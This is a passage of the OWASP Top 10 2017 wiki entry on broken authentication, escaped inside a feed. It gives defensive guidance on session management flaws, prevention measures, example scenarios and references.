Consider anonymous external attackers, as well as authorized users, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Attackers use leaks or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to temporarily or permanently impersonate users.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td colspan=2  {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, create account, change password, forgot password, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Such flaws may allow some or even all accounts to be attacked. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
     &amp;lt;td {{Template:Top 10 2010:SummaryTableRowStyleTemplate|year=2017}}&amp;gt;&lt;br /&gt;
Consider the business value of the affected data or application functions.&lt;br /&gt;
&lt;br /&gt;
Also consider the business impact of public exposure of the vulnerability.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/td&amp;gt;&lt;br /&gt;
{{Top_10_2010:SummaryTableEndTemplate|year=2017}}&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=1|risk=2|year=2017|language=en}}&lt;br /&gt;
Are session management assets like user credentials and session IDs properly protected? You may be vulnerable if:&lt;br /&gt;
# User authentication credentials aren’t properly protected when stored using hashing or encryption. See 2017-A6.&lt;br /&gt;
# Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).&lt;br /&gt;
# Session IDs are exposed in the URL (e.g., URL rewriting).&lt;br /&gt;
#  Session IDs are vulnerable to [[https://www.owasp.org/index.php/Session_fixation]] session fixation attacks.&lt;br /&gt;
# Session IDs don’t timeout, or user sessions or authentication tokens (particularly single sign-on (SSO) tokens) aren’t properly invalidated during logout.&lt;br /&gt;
# Session IDs aren’t rotated after successful login.&lt;br /&gt;
# Passwords, session IDs, and other credentials are sent over unencrypted connections. See 2017-A6.&lt;br /&gt;
See the [[ASVS]] requirement areas V2 and V3 for more details.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=2|risk=2|year=2017|language=en}}&lt;br /&gt;
The primary recommendation for an organization is to make available to developers:&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;'''A single set of strong authentication and session management controls.''' Such controls should strive to:&lt;br /&gt;
&amp;lt;ol type=&amp;quot;a&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;meet all the authentication and session management requirements defined in OWASP’s [https://www.owasp.org/index.php/ASVS Application Security Verification Standard (ASVS)] areas V2 (Authentication) and V3 (Session Management).&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;have a simple interface for developers. Consider the [https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/Authenticator.html ESAPI Authenticator and User APIs] as good examples to emulate, use, or build upon.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See 2017-A3.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=3|risk=2|year=2017|language=en}}&lt;br /&gt;
'''Scenario #1:''' Airline reservations application supports URL rewriting, putting session IDs in the URL:&lt;br /&gt;
{{Top_10_2010:ExampleBeginTemplate|year=2017}}&amp;lt;nowiki&amp;gt;h&amp;lt;/nowiki&amp;gt;ttp://example.com/sale/saleitems&amp;lt;span style=&amp;quot;color: red;&amp;quot;&amp;gt;?sessionid=268544541&amp;lt;/span&amp;gt;&amp;amp;dest=Hawaii&lt;br /&gt;
{{Top_10_2010:ExampleEndTemplate|year=2017}}&lt;br /&gt;
An authenticated user of the site wants to let their friends know about the sale. User e-mails the above link without knowing they are also giving away their session ID. When the friends use the link they use user’s session and credit card.&lt;br /&gt;
'''Scenario #2''': Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and that browser is still authenticated.&lt;br /&gt;
'''Scenario #3''': An insider or external attacker gains access to the system’s password database. User passwords are not properly hashed and salted, exposing every users’ password.&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubsectionAdvancedTemplate|type={{Top_10_2010:StyleTemplate}}|number=4|risk=2|year=2017|language=en}}&lt;br /&gt;
{{Top_10_2010:SubSubsectionOWASPReferencesTemplate|year=2017}}&amp;lt;br/&amp;gt;&lt;br /&gt;
For a more complete set of requirements and problems to avoid in this area, see the [[ASVS | ASVS requirements areas for Authentication (V2) and Session Management (V3)]].&lt;br /&gt;
* [[Authentication_Cheat_Sheet | OWASP Authentication Cheat Sheet]]&lt;br /&gt;
* [[Forgot_Password_Cheat_Sheet | OWASP Forgot Password Cheat Sheet]]&lt;br /&gt;
* [[Password_Storage_Cheat_Sheet|OWASP Password Storage Cheat Sheet]]&lt;br /&gt;
* [[Session_Management_Cheat_Sheet | OWASP Session Management Cheat Sheet]]&lt;br /&gt;
* [[Testing_for_authentication | OWASP Testing Guide: Chapter on Authentication]]&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2010:SubSubsectionExternalReferencesTemplate|year=2017|language=en}}&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/287.html CWE Entry 287 on Improper Authentication]&lt;br /&gt;
* [http://cwe.mitre.org/data/definitions/384.html CWE Entry 384 on Session Fixation]&lt;br /&gt;
&lt;br /&gt;
{{Top_10_2013:BottomAdvancedTemplate&lt;br /&gt;
    |type={{Top_10_2010:StyleTemplate}}&lt;br /&gt;
    |usenext=2013NextLink&lt;br /&gt;
    |next=A3-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |3&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |useprev=2013PrevLink&lt;br /&gt;
    |prev=A1-{{Top_10_2010:ByTheNumbers&lt;br /&gt;
              |1&lt;br /&gt;
              |year=2017&lt;br /&gt;
              |language=en}}&lt;br /&gt;
    |year=2017&lt;br /&gt;
    |language=en&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	</feed>